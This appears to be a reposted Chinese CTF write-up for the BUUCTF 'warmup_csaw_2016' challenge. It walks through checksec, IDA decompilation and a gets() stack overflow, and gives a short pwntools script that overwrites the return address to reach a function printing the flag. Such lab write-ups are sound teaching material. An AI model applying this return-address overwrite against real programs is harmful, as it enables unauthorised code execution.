3.[BUU]warmup_csaw_20161
2023-12-23 00:19:29
1.checksec 检查文件类型
ELF-64-little ,无其他限权,直接用ida检查代码。
2.IDA进行反编译,进行代码审计
查看各个名称的内容:
了解基本攻击思路:
攻击思路:gets输入垃圾数据覆盖v5内容,再将sub_40060D的地址覆盖return_addr,使其调用“system”函数,执行“cat flag.txt”,输出flag,进而得到flag。
v5距离ebp大小:
ebp大小:
3.EXP
from pwn import *
io = remote('node4.buuoj.cn',27089)
context(os='linux', arch='amd64', log_level='debug')
getshell=0x40060D
payload=b'a'*(0x40+0x8)+p64(getshell)
io.sendline(payload)
io.interactive()
因为flag是我们接收的数据,所以不用交互进行cat flag.直接在返回字符内容里面查看
文章来源:https://blog.csdn.net/2203_75523573/article/details/135162177
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!